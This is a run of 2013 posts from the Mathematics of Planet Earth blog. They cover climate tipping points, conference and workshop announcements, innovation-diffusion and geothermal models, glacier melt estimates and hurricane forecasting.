    The Next Generation Science Standards have just been released. These standards recommend the teaching of science via hands-on approaches with a focus on the scientific process rather than memorizing factoids. They propose that climate change be an integral part of science education starting already in middle school. One can imagine great synergistic opportunities between the mathematics of sustainability and these new science standards. Here is an article from The New York Times discussing the new standards. Print versions of the report can be ordered here.

    Posted in General | 1 Comment

    “Great Scientist > Good at Math”

    Last Friday, the Wall Street Journal (WSJ) published an essay by E.O. Wilson that has since generated much discussion from readers (229 comments to date) on the WSJ website and also among mathematicians. The most provocative part of the article is the headline, “Great Scientist ≠ Good at Math.” (As observed by Barry Cipra, the inequality ≠ is arguably correct, but it should really be written more strongly as “Great Scientist > Good at Math,” as in “to be a great scientist, you need to be more than good at math.”) The essay itself is less provocative than the headline, and one of the points that Wilson is trying to make is that students who are not especially good or outstanding at mathematics but yet passionate about science may turn away from serious work in the sciences. He himself had little training in formal mathematics but worked with many mathematicians.

    Here are a couple of interesting quotes:

    “Many of the most successful scientists in the world today are mathematically no more than semiliterate.”

    “Over the years, I have co-written many papers with mathematicians and statisticians, so I can offer the following principle with confidence. Call it Wilson’s Principle No. 1: It is far easier for scientists to acquire needed collaboration from mathematicians and statisticians than it is for mathematicians and statisticians to find scientists able to make use of their equations.”

    “Newton invented calculus in order to give substance to his imagination. Darwin had little or no mathematical ability, but with the masses of information he had accumulated, he was able to conceive a process to which mathematics was later applied.”

    I was struck by these comments in light of our MPE2013 efforts. After all, one of our primary purposes is to showcase the necessity of using sophisticated mathematics to solve hard problems. We (although I am most likely preaching to the choir) know for example, mathematical techniques are vital in understanding things like DNA genomic analysis, image processing and other problems in biology. Surely, Wilson must be aware of these developments.

    Recently, at the AIM workshop “Mathematical problems arising from biochemical reaction networks,” mathematicians as well as researchers who are closer to the experimental side of systems biology came together to tackle the analysis of biochemical reaction networks arising in systems biology. This workshop was really a counterexample to the above Wilson Principle No. 1.

    One of the workshop organizers, Jeremy Gunawardena, gave a wonderful talk about present and past work, with the mantra that “Biology is more theoretical than physics.” The idea was that mathematical analysis of biochemical networks may be feasible, using methods from computational algebra, algebraic geometry and dynamical systems, and that mathematical methods may be the only way to understand these highly complicated systems.

    One of the other common points made in comments is that perhaps Wilson is using a narrow view of what mathematics is. His view seems to be that mathematics is calculus and differential equations. Many of the elements that he thinks are important for scientific research – being a good observer, creativity, concept formulation – we think are also important elements of mathematics research.

    I am sure one can point to many examples where Wilson’s principle fails to hold, but if there is a lesson from the Wilson article, it is that there is much work to do to make the message of MPE2013 heard, not just to the general public but to scientists as well.

    Here are links to interesting comments by Paul Krugman (NYT, April 9, 2013) and Edward Frankel (Slate, April 9, 2013).

    Estelle Basor
    AIM

    Posted in Biology, General, Mathematics | 1 Comment

    Mathematics of Tipping Points

    A lake that used to be clear, with a rich vegetation and a diverse aquatic life, suddenly becomes turbid, with much less vegetation and only bottom dwelling fish remaining. It turns out that the change comes from increased nutrient loading, but when the runoff leading to the nutrient inflow is reduced, the lake doesn’t become clear again – it remains murky.

    A dry land area with patchy vegetation becomes completely barren after an especially dry season, but when normal rain patterns return, it remains a desert.

    An entire planet that used to have varied climate zones, ranging from tropical areas to icecaps near the poles, freezes over completely, perhaps due to variations in the solar energy output, with all oceans frozen except near some thermal vents and all continents covered by thick ice sheets. When the solar output increases again, the planet remains in its frozen state.

    These are examples of transitions of ecological systems past “tipping points” – the subject of a fascinating talk given by Mary Lou Zeeman on March 28 of this year in the Carriage House lecture hall of the Mathematical Association of America (MAA) in Washington, DC. Mary Lou, one of six children of the well known British mathematician Sir Christopher Zeeman, is a professor of mathematics at Bowdoin College and works on dynamical systems, with applications in ecology and biology. The Carriage House auditorium was full when she gave her talk. The audience included students, residents of the Washington area who are interested in science, and local mathematicians – just the ecological mix that the MAA lecture series tries to achieve.

    There is a commonality to all these scenarios that can be described with mathematical methods from bifurcation theory. Mary Lou used the “Snowball Earth” scenario of the third example to illustrate this. According to geological evidence, this “mother of all tipping points” actually occurred on Earth not just once, but several times about 600 million years ago. Each complete glaciation lasted many millions of years and ended only when carbon dioxide in the atmosphere accumulated due to volcanic emissions to levels which were much higher than today, leading to a monstrous greenhouse effect and a rapid transition from “snowball” to “hothouse” Earth. Mary Lou presented a fairly simple energy balance model that is capable of explaining the fact that both a moderate and a frozen climate state are possible and stable on the same planet, with the same solar output. These different climate states are possible since a planet with a moderate climate tends to have a low albedo (most of the sunlight is absorbed by oceans and continents and keeps the planet warm) while a frozen planet has a high albedo (sunlight is reflected back by ice packs and snowfields, keeping the planet cold). The model is flexible enough to explain also the transitions between “snowball” and “hothouse” states. Intriguingly, the so-called Cambrian explosion, during which many of today’s animal phyla first appeared, happened not long after these snowball episodes.

    Relatively simple mathematical models offer common explanations of such multiple stable states. Transitions between such states tend to be rapid and surprising, which is a scary thought. Mathematical insights can also lead to better detection mechanisms for such transitions and even suggest experiments to assess the resilience of an ecological system against random perturbations. For example, near such a transition point, such a system will return to its stable state more slowly after a perturbation, and its response to such a perturbation will also show more variance. Mary Lou specifically pointed to the work of Marten Scheffer and his co-authors on early warning signs for such critical transitions (Nature 2009, Science 2012).

    The mathematical sciences therefore can contribute to decision support for managers and policymakers. The speaker suggested that when ecological systems are observed and managed for sustainability, such a goal should include resilience. In mathematical terms, this means one should not just identify stable equilibrium states but also understand the “size” of their basin of attraction and their sensitivity to changes of external parameters.

    And here’s another term that I remember from this talk: Mathematical scientists should show “interdisciplinary courage” and instill this in their students. This includes not just a willingness to learn the language and problems of another discipline. In the privacy of their office, mathematicians are already used to dead ends and unsuccessful attempts before coming up with good ideas. As members of interdisciplinary reserach teams, they also need to risk having “bad ideas in public”. That’s a resilience that all of us should acquire.

    Hans Engler
    Department of Mathematics and Statistics
    Georgetown University
    Washington, DC 20057

    Posted in Climate Modeling, Mathematics | Leave a comment

    “World Conference on Natural Resource Modeling,” Cornell University, June 18-21, 2013

    When I was just launching my career in the mid-90’s, I admit to being a bit jealous of some of my friends and colleagues in the sciences who seemed to be attending small professional meetings. Although I enjoyed (and continue to enjoy) the Joint Mathematics Meetings, I longed for a smaller, more focused meeting where I could engage in deeper discourse. A flier on a bulletin board caught my eye about a conference for mathematicians, economists, ecologists, fisheries and forestry modelers, and others – the conference was run by a group called the Resource Modeling Association. Given my interests in mathematics and the environment, I decided to attend. I realized immediately that I’d found my niche – and I now gladly invite you to join us. If you have been enjoying the JMM sessions on natural resource modeling, environmental modeling, and climate change modeling, you should check out this group. I have learned so much from the interdisciplinary talks that have invited me to bring my expertise and ideas to a wide variety of projects that use mathematical modeling to contribute to our understanding about natural resources, climate change, conservation, fisheries management, forestry management, and more. The RMA meetings are held in the summer and the venues are always gorgeous. The meetings alternate between locations in North America and locations outside of North America – last year, we were in Brisbane, Australia. This year, we’ll be in Ithaca, New York. Next year, we’ll be in Vilnius, Lithuania. My association with this group has enabled me to travel all over the world, visiting locations I never would have seen otherwise.

    Please join us at the World Conference on Natural Resource Modeling. This annual meeting is run by the Resource Modeling Association. In June 2013, the conference will be held at Cornell University.

    Cornell University is located in Ithaca, New York, in the heart of the Finger Lakes, a beautiful area of lakes, farms, wineries, and outstanding restaurants. Keynote speakers include Evan Cooch (Cornell University) who will talk on “Inferences about Coupling from Ecological Surveillance Monitoring: Application of Information Theory to Nonlinear Systems,” Carla Gomes (Cornell University) who will discuss “Computational Sustainability,” John Livernois (University of Guelph), who will speak on “Empirical Tests of Nonrenewable Resource Modeling: What Have We Learned?,” Michael Neubert (Woods Hole Oceanographic Institute) who will discuss “Strategic Spatial Models for Fisheries Management,” and Steven Philips (AT&T Labs), with a talk on “Multiclass Modeling of Arctic Vegetation Distribution Shifts and Associated Feedbacks under Future Climate Change.

    These are relatively small conferences (generally around 100 people from multiple disciplines) that provide remarkable opportunities for deep discussions of issues of mutual interest. We welcome your participation and you are invited to present a 20-minute paper (abstracts due in April). Generous prizes are awarded for the best student papers.

    The Resource Modeling Association was founded over 30 years ago by a group of mathematicians with interests in mathematical bioeconomics. The group started holding small workshops that quickly expanded to include ecologists, economists, and statisticians. The RMA’s mission is to encourage dialogue between scientists. The RMA works at the intersection of mathematical modeling, environmental science, and natural resource management. We formulate and analyze models to understand and inform the management of renewable and exhaustible resources. We are particularly concerned with the sustainable utilization of renewable resources and their vulnerability to anthropogenic and other disturbances.


    The RMA publishes the journal Natural Resource Modeling. NRM is an international journal devoted to mathematical modeling of natural resource systems. The major theme for the journal is the development and analysis of mathematical models as tools for resource management and policy development. The analysis may be applied to a wide variety of resources: renewable and exhaustible resources, terrestrial and marine resources, energy, land and soils, water resources, problems of pollution and residuals, managed biological populations, agriculture and fisheries, rangeland and forest, wildlife and wilderness, preservation of endangered species and genetic diversity.

    Catherine A. Roberts
    Any questions? Contact Catherine A. Roberts, Editor-in-Chief of Natural Resource Modeling at editor@resourcemodeling.org.

    Posted in Biodiversity, Conference Announcement, Ecology, Resource Management | Leave a comment

    Workshop “Mathematics of Climate Change, Related Natural Hazards and Risks”

    MPE2013 provides opportunities for networking with other disciplines and capacity building in regions of the world. One such project is the workshop “Mathematics of Climate Change, Related Natural Hazards and Risks,” which will take place in Guanajuato, Mexico, July 29 to August 2, 2013, as a a satellite activity of the Mathematical Congress of the Americas.

    This workshop is the first to be organized jointly by the International Mathematical Union (IMU), International Union of Geodesy and Geophysics (IUGG) and International Union of Theoretical and Applied Mechanics (IUTAM) and is sponsored by the International Council of Science (ICSU), the International Council of Industrial and Applied Mechanics (ICIAM) and the Centro de Investigación en Matematicas (CIMAT), Guanajuato, Mexico. It is supported by the regional office of ICSU for Latin America and the Caribbean (ROLAC), by two bodies of ICSU: World Climate Research Programme (WCRP) and Integrated Research on Disaster Risk (IRDR), by the U.S. National Academy of Science (NAS), and by Academia Mexicana de Ciencias (AMC). The workshop is symbolic for the overarching impact of “Mathematics of Planet Earth” (MPE2013) on the mathematics, mechanics, and geophysics scientific communities worldwide. The main objective of the workshop is to facilitate an international multidisciplinary discussion around the central topics of climate research, environmental hazards, and sustainable development. The workshop is targeted at a diverse group of participants, mainly coming from Central and South America.

    Mathematics, statistics, and mechanics are essential tools in geodesy and geophysics. Broadly defined, quantitative mathematical training is an essential part of the preparation of the future generation of researchers dealing with climate change and natural hazards. Mathematical methods play a defining role in modern climate and natural hazards studies. The workshop will allow a diverse group of post-doctoral students and young researchers, including a large group of female scientists, mainly from Central and South America, to learn from and interact with internationally recognized leading experts in different aspects of the rapidly growing multifaceted field of global environmental change. The workshop will result in establishing new research ties and specific projects within and outside the Americas.

    The scientific program consists of a series of lectures delivered by nine international leaders in the field of climate science and natural hazards. The lecture topics will be divided into three general themes. Each thematic block will be concluded with a roundtable, facilitated by one of the lecturers and a student, which will help summarize the material presented and draw conclusions. The workshop will provide ample opportunities for interaction and informal discussions.

    The workshop will focus on the modern quantitative data- and model-driven approaches towards predictive understanding of the climate change, the effects of a changing climate on other natural hazards, and the related risks and socio-economic implications. Particular emphasis will be given to hazards in Central and South America.

    The workshop presentations will be structured around three main themes.

    Theme 1 — Methodology of the climate and natural hazards research: This theme will focus on the essential methodological aspects of climate science, with emphasis on the cross-links among geosciences, mathematics, and computer science. Data assimilation, statistical approaches to paleoclimate reconstruction, tracer-based techniques, large-scale numerical modeling, dynamical system theory, and Lagrangian transport in geophysical flows are some of the topics that will be presented by the leading experts in the respective fields. A comprehensive review of past Earth climates and climate forecast approaches will also be given.

    Theme 2 — Climate change and environmental hazards: This theme will review specific data sets and models that quantify the past and present changes in Earth’s climate and project them into the future. The speakers will give an overview of various environmental hazards related to the changing climate, their impacts, and mitigation strategies.

    Theme 3 — Socio-economic implications of climate change and extreme hydro- meteorological hazards: The changing climate and the related natural hazards and risks pose a multitude of pressing social, economic, and ethical questions. The lectures in this theme will provide a broader view of the climate research and its intrinsic connections with many important aspects of human life and society.

    The confirmed speakers are Graciela Canziani, Susan Cutter, Oscar Velasco Fuentes, Michael Ghil, Eugenia Kalnay, Carlos R. Mechoso, George Philander, Bala Rajaratnam and Eli Tziperman.

    The Scientific Committee is composed of Susan Friedlander (IMU), Paul Linden (IUTAM) and Ilya Zaliapin (IUGG).

    The application deadline for participants is April 30, 2013. Priority will be given to young researchers from Latin America and the Caribbean. Apply here.

    Christiane Rousseau

    Posted in Workshop Announcement | Leave a comment

    MECC 2013 – Portugal, 21-28 March 2013

    Last week I attended “MECC 2013” – the International Conference and Advanced School Planet Earth, Mathematics of Energy and Climate Change, Portugal, 21-28 March 2013.

    The main part of the conference took place over two and a half days in the magnificent Calouste Gulbenkian Foundation building in the center of Lisbon (as I discovered while there, the same building is also the concert hall of the Gulbenkian Orchestra – one night I went to a fine performance of the Brahms Requiem). There were fourteen keynote speakers as well as “thematic sessions” covering numerous aspects of mathematics, statistics and economics associated with climate change, renewable energy and related themes. I was one of the keynote speakers, and talked about some recent work I have been doing on climate extremes (assessing the evidence that extreme events are becoming more frequent and to what extent this can be attributed to the human influence). Another keynote speaker was my North Carolina colleague Chris Jones, who gave his talk by video link from Chapel Hill – a venture that was largely successful, though there were some technical glitches.

    Associated with the conference was an Advanced School that included additional lectures by some of the keynote speakers at the University of Lisbon. I was one of the speakers at that as well, and so gave a morning of lectures to graduate students and faculty, mostly from the Statistics department of the university. It was pleasant to catch up with a number of old friends and colleagues from that department.

    Overall, it was an enjoyable experience and a good opportunity to learn about some of the work being done in Portugal on these important topics. The only disappointment was that there was not a larger attendance – the facilities of the Gulbenkian could easily have accommodated more people.

    Richard Smith
    University of North Carolina and SAMSI

    Posted in Climate, Conference Announcement, Energy | Leave a comment

    Mathematical Models Help Energy-efficient Technologies Take Hold in a Community

    Mathematical models can be used to study the spread of technological innovations among individuals connected to each other by a network of peer-to-peer influences, such as in a physical community or neighborhood. One such model was introduced in a paper published last week in the SIAM Journal on Applied Dynamical Systems.

    Authors N. J. McCullen, A. M. Rucklidge, C. S. E. Bale, T. J. Foxon, and W. F. Gale focus on one main application: The adoption of energy-efficient technologies in a population, and consequently, a means to control energy consumption. By using a network model for adoption of energy technologies and behaviors, the model helps evaluate the potential for using networks in a physical community to shape energy policy.

    The decision or motivation to adopt an energy-efficient technology is based on several factors, such as individual preferences, adoption by the individual’s social circle, and current societal trends. Since innovation is often not directly visible to peers in a network, social interaction—which communicates the benefits of an innovation—plays an important role. Even though the properties of interpersonal networks are not accurately known and tend to change, mathematical models can provide insights into how certain triggers can affect a population’s likelihood of embracing new technologies. The influence of social networks on behavior is well recognized in the literature outside of the energy policy domain: network intervention can be seen to accelerate behavior change.

    Compact Fluorescent Bulb

    Compact fluorescent light bulbs beat traditional light bulbs at energy efficiency

    “Our model builds on previous threshold diffusion models by incorporating sociologically realistic factors, yet remains simple enough for mathematical insights to be developed,” says author Alastair Rucklidge. “For some classes of networks, we are able to quantify what strength of social network influence is necessary for a technology to be adopted across the network.”

    The model consists of a system of individuals (or households) who are represented as nodes in a network. The interactions that link these individuals—represented by the edges of the network—can determine probability or strength of social connections. In the paper, all influences are taken to be symmetric and of equal weight. Each node is assigned a current state, indicating whether or not the individual has adopted the innovation. The model equations describe the evolution of these states over time.

    Households or individuals are modeled as decision makers connected by the network, for whom the uptake of technologies is influenced by two factors: the perceived usefulness (or utility) of the innovation to the individual, including subjective judgments, as well as barriers to adoption, such as cost. The total perceived utility is derived from a combination of personal and social benefits. Personal benefit is the perceived intrinsic benefit for the individual from the product. Social benefit depends on both the influence from an individual’s peer group and influence from society, which could be triggered by the need to fit in. The individual adopts the innovation when the total perceived utility outweighs the barriers to adoption.

    When the effect of each individual node is analyzed along with its influence over the entire network, the expected level of adoption is seen to depend on the number of initial adopters and the structure and properties of the network. Two factors in particular emerge as important to successful spread of the innovation: The number of connections of nodes with their neighbors, and the presence of a high degree of common connections in the network.

    This study makes it possible to assess the variables that can increase the chances for success of an innovation in the real world. From a marketing standpoint, strategies could be designed to enhance the perceived utility of a product or item to consumers by modifying one or more of these factors. By varying different parameters, a government could help figure out the effect of different intervention strategies to expedite uptake of energy-efficient products, thus helping shape energy policy.

    “We can use this model to explore interventions that a local authority could take to increase adoption of energy-efficiency technologies in the domestic sector, for example by running recommend-a-friend schemes, or giving money-off vouchers,” author Catherine Bale explains. “The model enables us to assess the likely success of various schemes that harness both the householders’ trust in local authorities and peer influence in the adoption process. At a time when local authorities are extremely resource-constrained, tools to identify the interventions that will provide the biggest impact in terms of reducing household energy bills and carbon emissions could be of immense value to cities, councils and communities.”

    One of the motivations behind the study—modeling the effect of social networks in the adoption of energy technologies—was to help reduce energy consumption by cities, which utilize over two-thirds of the world’s energy, releasing more than 70% of global CO2 emissions. Local authorities can indirectly influence the provision and use of energy in urban areas, and hence help residents and businesses reduce energy demand through the services they deliver. “Decision-making tools are needed to support local authorities in achieving their potential contribution to national and international energy and climate change targets,” says author William Gale.

    Higher quantities of social data can help in making more accurate observations through such models. As author Nick McCullen notes, “To further refine these types of models, and make the results reliable enough to be used to guide the decisions of policy-makers, we need high quality data. Particularly, data on the social interactions between individuals communicating about energy innovations is needed, as well as the balance of factors affecting their decision to adopt.”

    Source article:
    Multiparameter Models of Innovation Diffusion on Complex Networks, N. J. McCullen, A. M. Rucklidge, C. S. E. Bale, T. J. Foxon, and W. F. Gale, SIAM Journal on Applied Dynamical Systems, 12(1), 515–532. (Online publish date: March 26, 2013). The source article is available for free access until June 27, 2013.

    About the Authors:
    Nick McCullen is a lecturer in the Department of Architecture and Civil Engineering at the University of Bath in the U.K. Alastair Rucklidge is a professor and Head of the Department of Applied Mathematics at University of Leeds in the UK. Tim Foxon is a reader in Sustainability & Innovation in the Sustainability Research Institute, School of Earth and Environment at the University of Leeds. William Gale is a professor and Catherine Bale a research fellow at the Energy Research Institute in the School of Process, Environmental and Materials Engineering at University of Leeds. This work was funded under the EPSRC Energy Challenges for Complexity Science panel, grant EP/G059780/1.
    # # #

    About SIAM:
    The Society for Industrial and Applied Mathematics (SIAM), headquartered in Philadelphia, Pennsylvania, is an international society of over 14,000 individual members, including applied and computational mathematicians and computer scientists, as well as other scientists and engineers. Members from 85 countries are researchers, educators, students, and practitioners in industry, government, laboratories, and academia. The Society, which also includes nearly 500 academic and corporate institutional members, serves and advances the disciplines of applied mathematics and computational science by publishing a variety of books and prestigious peer-reviewed research journals, by conducting conferences, and by hosting activity groups in various areas of mathematics. SIAM provides many opportunities for students including regional sections and student chapters. Further information is available here.
    [Reporters are free to use this text as long as they acknowledge SIAM]

    Posted in Energy, Mathematics, Resource Management | 1 Comment

    Data, Mathematics, and the Social Sciences

    Last September the White House honored Michael Flowers, New York’s Director of Policy and Strategic Planning Analytics, as a Champion of Change. Flowers’ team figures out ways to use an effective combination of common sense and analysis of data, which is now easily available on the internet to efficiently solve some of New York’s vexing problems, including combating prescription drug abuse, property fraud, and figuring out which restaurants are illegally dumping grease into the city’s sewers.

    This is an example of new tools that are now available largely because of the internet.

    It may be true that the internet is killing some industries. Print newspapers may be dying and bookstores are failing, but the internet is creating or transforming others. I was really impressed by the simple but powerful idea that flu outbreaks can be identified by studying google searches. And now Mayor Bloomberg’s low budget office is solving high level problems that have been largely intractable until now.

    Here is an example with a quote from a press release from the NYC Mayor’s office.

    “To identify properties with a higher-risk of fire death, for instance,
    the Policy and Strategic Planning Analytics Team combined FDNY data with
    information on illegal housing conversion complaints, foreclosures, tax liens
    and neighborhood demographics. The Analytics Team then created a risk
    assessment model that provides a list of the highest risk properties with
    illegal conversion complaints. These high-risk locations are jointly
    inspected within 48 hours by the Department of Buildings and FDNY, and
    the joint inspection team uncovered unsafe conditions for inhabitants 70
    percent of the time using this predictive model … a five-fold increase in
    effectiveness over typical inspections.”

    See also this article in The New York Times.

    To me these really interesting ways that math is used to address social issues are exactly the theme of MPE2013. I’d love to hear of more examples like these.

    Brian Conrey
    Director, American Institute of Mathematics

    Posted in General, Public Health, Social Systems | Leave a comment

    Geothermal Energy Harvesting

    As the energy needs are expected to surpass the energy content found in available fossil-fuel resources in this century, interest in renewable energy sources has increased in the past decade. One area of interest is in geothermal energy harvesting. With these systems, energy is retrieved from the Earth to be used on the surface either directly, such as providing heat to a community, or converted to electrical energy. However, as the fluid moves through the piping from its deepest depth to the surface, energy is transferred from the fluid to the surrounding soil. In conventional deep wells (depths of 4 km or more), this transfer results in a transmission loss of energy, while in more shallow residential geothermal heat-pump systems (depths of 100 m), this transfer is the main energy harnessing mechanism.

    We have recently employed some classical mathematical modeling approaches to these systems. For example, with my collaborator T. Baumann at the Technical University-Munich (TUM), we described the temperature attenuation in the fluid from a deep aquifer at a geothermal facility in the Bavarian Molasse Basin [1]. Energy losses depend on the production rate of the facility (potentially up to 30%). Our approach takes advantage of the small aspect ratio between the radius of the well to its length, and that the energy balance is between the axial energy transport in the fluid compared to the radial transport in the soil. We find that the dominant eigenfunction for the radial problem in the fluid captures this balance, and that the corresponding eigenvalue provides the appropriate constant relating the effective axial energy flux with the temperature drop over the length of the well. In the design of these wells, this constant traditionally is prescribed from phenomenological experience.

    This approach may be quite useful in the construction of the shallow residential geothermal heat-pump systems. Although operation of these systems is about a third of the cost of conventional heating and cooling systems, they are currently not economically viable, since the installation cost of the wells depends significantly on the well depth required for the power needs of the residence. These systems are used year round, with energy deposited into the soil from the residence in the summer months, and then retrieved in the winter months for heating.

    Recently, a group of undergraduate students participated at the NSF-funded Research Experiences for Undergraduates program at Worcester Polytechnic Institute to work on this problem, which was brought to us from the New England Geothermal Professionals Association. With our modeling approach, the eigenvalue and the axial behavior gives a characteristic length for the well, over which an energy attenuation of 1/e is achieved. Hence, three of these characteristic lengths are needed to attain over 90\% of the possible energy available. We are currently extending these approaches to horizontal piping systems.

    B.S. Tilley
    Department of Mathematical Sciences
    Worcester Polytechnic Institute
    Worcester, MA 01609

    [1] B.S. Tilley and T. Baumann, “On temperature attenuation in staged open-loop wells”, Renewable Energy, 48 416-423: (2012)

    Posted in Renewable Energy | Leave a comment

    Celebrate the Mathematics of Sustainability

    The earth provides us with an astonishing variety of resources. For humanity to flourish, we must balance our human needs, such as those for energy, clean air, fresh water, and adequate food, with the availability of these resources. And we must do so while operating within the complex constraints imposed by the laws of nature and the perhaps equally complex “laws” of human behavior. So sustainability involves environmental, social, and economic aspects, all of which are interconnected.

    April is Mathematics Awareness Month (MAM). This year’s theme is Mathematics of Sustainability, which explores how mathematics helps us better understand these complex questions. Society and individuals will need to make challenging choices; mathematics provides us with tools to make informed decisions. Given the importance and timeliness of this year’s theme, the Advisory Committee for MAM has organized two nationwide initiatives.

    *Sustainability Counts!

    This educational initiative provides a range of model lessons for K-16 math educators that link math with sustainability. In honor of Mathematics Awareness Month, we invite educators to teach a lesson on this topic. The showcase lesson is the Sustainability Counts Energy Challenge in which students both learn about the mathematics of energy use at their institution and then develop and implement an action plan to reduce energy use. By tracking how much energy is saved nationally, students will see that while sustainability starts with individual effort, creating a sustainable society requires large-scale cooperation across the nation and around the world.

    We encourage our international colleagues in MPE to share this idea of using sustainability as a way to inspire student interest in mathematics with their colleagues involved in mathematics education.

    *Speakers’ Bureau

    This is a group of mathematicians, scientists and sustainability professionals who are available to speak to school audiences and community groups on various topics related to the mathematics of sustainability. The bureau was created in conjunction with the Mathematics of Planet Earth (MPE) 2013 initiative. If you would like to become part of the group, please sign up to become a speaker.

    About Math Awareness Month and JPBM:

    Mathematics Awareness Month (MAM), held each year in April, is sponsored by the Joint Policy Board for Mathematics (JPBM) to increase public understanding of and appreciation for mathematics.

    At the MAM Website you can find theme essays, related resources, a blog, and download a copy of the 2013 poster.

    Activities for Mathematics Awareness Month generally are organized on local, state and regional levels by college and university departments, institutional public information offices, student groups, and related associations and interest groups. If you organize an activity, please tell us about it.

    The JPBM is a collaborative effort of the American Mathematical Society (AMS), the American Statistical Association (ASA), the Mathematical Association of America (MAA), and the Society for Industrial and Applied Mathematics (SIAM).

    Contact:
    Victor Donnay
    MAM 2013 Committee Chair
    Bryn Mawr College
    mathaware2013@gmail.com

    Posted in Mathematics, Sustainable Development | 1 Comment

    Our blog is on spring break. We’ll be back on Monday, April 1.

    Posted in General | Leave a comment

    The Melting of Glaciers

    We hear regularly some warnings of scientists on the important rise of the sea level that will occur before the end of the century. The worst scenario usually predicts a rise of less than a meter before 2100.

    Where does this number come from? The common answer is that the rise of the sea level comes both from the melting of glaciers and the dilatation of the seawater due to the increase of its temperature.

    I have made the exercise of calculating the volume of the glaciers of Greenland and Antarctica. The area of glaciers in Greenland is 1,775,637 km^2 and their volume is 2,850,000km^3. The area of Antarctica is 14,000,000 km^2 and the thickness of ice is up to 3km. If we take a mean thickness of 2km, then this gives a volume of 28,000,000 km^3.

    Hence, the total volume of ice of the glaciers of Greenland and Antarctica is of the order of 30,850,000 km^3. Now, the area of the oceans is 335,258,000km^2. Hence, if all glaciers were to melt and produce the same volume of water (OK, it is a little less, but the water will dilate when its temperature increases) we would have a rise of the sea level of 92 meters!

    Can we explain the difference? Of course, my model is very rough. It is not clear that all the new water will stay in the oceans. Some could percolate in the soil, and some could evaporate in the atmosphere. I have asked the question recently to Hervé Le Treut, from the Institut Pierre Simon Laplace in Paris. His answer was that the ice melts slowly, and hence it takes much more than 90 years for all the glaciers to melt.

    But it raises another question. Why do we stop our predictions in 2100? Is sustainability no more necessary past 2100?

    Christiane Rousseau

    Posted in Climate Change | Leave a comment

    Mathematical Sciences in the 21st Century

    Although in the eyes of an uninformed observer the mathematical sciences have an invisible presence in the everyday life, the recent developments in modern communications, transportation, science, engineering, technology, medicine, manufacturing, security and finance have all been enabled by advances in the mathematical sciences. Mathematics, statistics, operations research, and theoretical computer science have all been fundamental for the many of the recent advances in our modern society.

    A distinguished panel of experts, gathered by the National Academies, has recently produced a very interesting and informative publication: Fueling Innovation and Discovery: The Mathematical Sciences in the 21st Century. This publication was released by the National Academies in advance of their report The Mathematical Sciences in 2025, developed with support from the National Science Foundation.
    The publication succinctly presents a dozen examples, discussing the mathematics involved in the recent development of the human genome, medical imaging, medical diagnosis, information technology, animation as well as in the computational modeling of tsunamis, traffic, spread of pollutants etc. While by no means comprehensive, the selection of topics gives the reader an important view on various topics in the mathematical sciences that have significantly impacted the advances in new technologies and industries and our understanding of the world. At the same time the examples show the universality of mathematics, as the same concepts yield new insights in a multitude of disciplines and areas of human endeavor.

    So why are the mathematical sciences still invisible in everyday life? Actually they are not; it is only the uninformed observer who needs to have the curiosity to understand what the sources of advancement are in our modern technological society, and publications like this can definitely help.

    Posted in General, Mathematics | Leave a comment

    The Mathematics of Sustainability

    Opinion article by Simon Levin, published in the Notices of the American Mathematical Society, April 2013, p. 392-3.

    Click here to download the full text of the article.

    Posted in General, Sustainable Development | Leave a comment

    A View of Prediction of the Atmosphere

    This morning I heard a lecture by Rick Anthes, president emeritus of UCAR, former director of NCAR. His talk was entitled “Butterflies and Demons,” and the subject was predictability of weather and climate. He was a witness to, and participant in the development of numerical weather prediction in the form it exists today at weather centers worldwide. It was a particularly interesting and provocative talk.

    Numerical weather prediction proved its worth in the forecasts of the track and severity of Hurricane Sandy. Without the forecasts, the property damage and loss of life would have been much worse than it was. One might compare the effect of Sandy to the Galveston flood of 1900 for which there was no warning and thousands of people lost their lives. Sandy was the only hurricane in history that made landfall on the Atlantic coast from the east. Dr. Anthes showed a slide with the tracks of every Atlantic coast hurricane since 1850. Most tracked up the coast, and those that went east into the Atlantic did not return. One might reasonably question the reliability of data extending back to the age of sail, but no statistical method based on previous experience could possibly have predicted that a hurricane would go northeast from the coast and then return westward to make landfall since it had never happened before.

    At this point it is important to note that the national weather centers make more than a single numerical forecast. In addition to a main central forecast, they make a collection of forecasts, numbering in the hundreds at some weather centers, each differing slightly in some respect, usually in the initial conditions. They refer to such collections of simultaneous forecasts as “ensembles.” The spread among the ensemble members is expected to reflect uncertainty in the forecast. Dr. Anthes showed the ensemble produced by the European Center for Medium Range Weather Forecasting (ECMWF) of predicted tracks for Sandy. Nearly all of them exhibited the correct behavior. Perhaps five of the several hundred tracks predicted by the ensemble members led out into the Atlantic and did not return.

    Dr. Anthes said that accurate forecasts such as the ones issued by ECMWF for the track of Sandy would have been impossible 20 years ago. He emphasized the fact that advances in science, in the form of improved numerical technique, data assimilation and understanding of rain and clouds, along with spacecraft as well as earthbound instruments and data processing techniques may well have saved thousands of lives and billions of dollars in property damage.

    It was certainly good to see benefits to society that come from my corner of the world of scientific research. It’s the received wisdom in the world of hurricane forecasting that predictions of tracks have improved considerably over the years, while improvement in prediction of intensity has been much slower. Dr. Anthes’ graph showing improvement of skill in forecasting of hurricane tracks since 1980 didn’t strike me as being quite so impressive as other aspects of weather forecasting. If I read the graph correctly, the accuracy of present two-day storm track forecasts is about equivalent to the accuracy of one-day storm track predictions in 1980. By contrast, the graph shown by Dr. Anthes of global weather forecast skill showed that our 5-day forecasts today are as accurate as our 2-day forecasts were in 1995.

    Dr. Anthes gave three talks at Oregon State during his visit, and this was the only one I was able to attend. The talk I heard was billed as the most technical of the three, and per his introduction, it wasn’t nearly as technical as the usual seminars in the series given by the Physics of Oceans and Atmospheres group. There were no equations, but much scientific insight and lots to think about.

    Robert Miller
    College of Earth, Ocean, and Atmospheric Sciences
    Oregon State University
    miller@coas.oregonstate.edu

    Posted in Atmosphere, Meteorology | Leave a comment

    AWM Research Symposium at Santa Clara University, March 16

    Last Saturday, at the Association for Women in Mathematics (AWM) Research Symposium at Santa Clara University, Inez Fung gave a wonderful spirited lecture on “Climate Math.” She described some of the early history of computing and forecasting climate and some of the new challenges in projecting future climate change. She addressed the question of whether recent weather events suggest that the weather has become chaotic and if this is related to climate change with some interesting insights from the Lorenz butterfly attractor.

    This talk was a preview of the South African MPE2013 Simons Public Lecture, which will be delivered by Inez Fung on March 26, 2013 in Cape Town.

